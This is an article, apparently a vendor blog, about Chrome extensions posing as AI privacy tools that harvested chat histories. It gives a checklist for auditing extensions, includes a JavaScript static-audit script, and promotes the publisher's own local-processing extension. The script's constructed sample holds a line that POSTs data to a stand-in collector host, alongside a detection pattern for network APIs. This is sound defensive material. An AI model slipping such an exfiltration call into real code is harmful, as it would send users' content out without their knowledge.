By · Last updated 2026-04-19


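Is Your AI Privacy Tool Stealing Your Data?

67% of AI Chrome extensions collect user data. In the December 2025 incident, 900,000 users were harmed by extensions disguised as privacy protection tools.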

April 19, 2026 · 8 min read
privacy extension verification · local processing trust · extension data collection audit · AI privacy tool evaluation · Chrome extension security checklist

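Privacy Tools That Steal Data

In December 2025, Chrome tools marketed as AI privacy protection were found to be spying on users. They captured complete chat histories and sent the content to attacker-controlled servers.

This is the core paradox: the privacy tool itself became the source of the threat.

Caviard.ai found that 67% of AI Chrome extensions collect user data. Some disclose this; others do not. But disclosure is not the core issue. The real question is whether the tool's architecture makes data theft structurally impossible, or whether theft is merely prohibited by policy.

The DLA Piper 2025 GDPR report shows that the average fine in 2024 rose 34% over 2023. This trend raises the stakes for data protection officers who approve browser tools for employees.

What Real Local Processing Looks Like

A true local-processing tool runs its detection model inside the browser. The model ships with the install package or is downloaded once. After that, no content is sent to the publisher's servers.

The only outbound traffic is the redacted prompt sent to the AI service, plus routine browser requests such as update checks. Content never passes through the publisher's network.

This architecture can be tested and verified. A publisher's promise alone cannot be trusted; the December 2025 incident proved that.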

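How to Test Any Privacy Tool

Don't ask whether the publisher promises to protect privacy. Ask whether the tool's design makes data theft technically impossible.

Network test: Install the tool on a monitored network, paste fake personal identifiers into a test AI account, and watch all outbound connections for 30 seconds. If any traffic goes to a domain other than the AI platform or the tool's update server, your content is being routed somewhere else.

Code review: Chrome extensions are JavaScript packages and can be decompiled. A true local-processing tool has no network calls in its detection code. The absence of fetch, XMLHttpRequest and WebSocket in the detection module is a good sign; their presence is disqualifying.

Permission check: Chrome Manifest V3 requires explicit permission declarations. A local-processing tool does not need permission to send content outside the browser. Clipboard access combined with broad network permissions, with no clear reason, is a red flag.

Publisher check: Verified publisher status on the Chrome Web Store requires domain proof and identity documents. A new publisher selling an AI privacy tool, paired with a newly registered domain, warrants extra scrutiny. The December 2025 attackers used short-lived identities to evade detection.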
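
The permission check and code review above can be scripted against an unpacked extension. The following is an added example, not code from this article's publisher or from any extension it discusses; the sample manifest, file names and domains are constructed, and the pattern also matches EventSource and sendBeacon, which goes beyond the three APIs named above.

```javascript
// Static audit of an unpacked Manifest V3 extension (added example).
// The sample manifest, file names and domains below are constructed.
const BROAD_HOSTS = new Set(["<all_urls>", "*://*/*", "http://*/*", "https://*/*"]);
const NETWORK_APIS = /\b(fetch|XMLHttpRequest|WebSocket|EventSource|sendBeacon)\b/g;

// Permission check: flag broad host access, and clipboard access combined with it.
function auditManifest(manifest) {
  const findings = [];
  const hosts = [
    ...(manifest.host_permissions || []),
    ...(manifest.content_scripts || []).flatMap((cs) => cs.matches || []),
  ];
  const broad = [...new Set(hosts.filter((h) => BROAD_HOSTS.has(h)))];
  if (broad.length) findings.push(`broad host access: ${broad.join(", ")}`);
  const clip = (manifest.permissions || []).filter((p) => p.startsWith("clipboard"));
  if (clip.length && broad.length) {
    findings.push(`clipboard + broad network: ${clip.join(", ")}`);
  }
  return findings;
}

// Code review: per file, list the network primitives the source text references.
// Deliberately conservative: any mention, even in a comment, is reported for review.
function auditSources(files) {
  const hits = {};
  for (const [name, src] of Object.entries(files)) {
    const found = [...new Set(src.match(NETWORK_APIS) || [])];
    if (found.length) hits[name] = found;
  }
  return hits;
}

// Constructed sample: what would be read from manifest.json and the script files.
const sampleManifest = {
  manifest_version: 3,
  name: "Example Privacy Shield",
  permissions: ["clipboardRead", "storage"],
  host_permissions: ["<all_urls>"],
  content_scripts: [{ matches: ["https://chat.example.com/*"], js: ["detect.js"] }],
};
const sampleSources = {
  "detect.js": "function redact(t){return t.replace(/Jane Smith/g,'[PERSON_1]');}",
  "sync.js": "function flush(b){fetch('https://collector.example.net/v1',{method:'POST',body:b});}",
};

console.log(auditManifest(sampleManifest));
console.log(auditSources(sampleSources));
```

A clean result only covers plain-text references; calls that are obfuscated or built at run time will not match, so the network test still decides.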

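900,000 Users Affected

Astrix Security's analysis of the December 2025 incident shows that 900,000 users were hit by extensions disguised as privacy tools. These users chose the tools precisely to protect their AI sessions, and the tools did the opposite.

A single compromised employee account can expose customer records, legal documents and internal plans. The security and compliance overview explains in detail how this chain of risk works.

Choosing a Verifiable Tool

The anonym.legal Chrome extension runs personal-information detection entirely locally inside the browser; nothing is sent to anonym.legal servers.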

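|  | Malicious extension | anonym.legal |
| --- | --- | --- |
| Processing location | Remote server | Browser-local only |
| Access scope | Full session capture | Only when activated |
| User-verifiable |  | Yes, just test the network |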

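How it works:

  1. You paste text containing personal identifiers
  2. Detection runs locally in your browser
  3. Names and IDs become placeholders: "Jane Smith" becomes [PERSON_1]
  4. The redacted text is sent to the AI
  5. The AI's reply is restored locally for you

The compliance center contains the full list of entity types and enterprise audit details.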

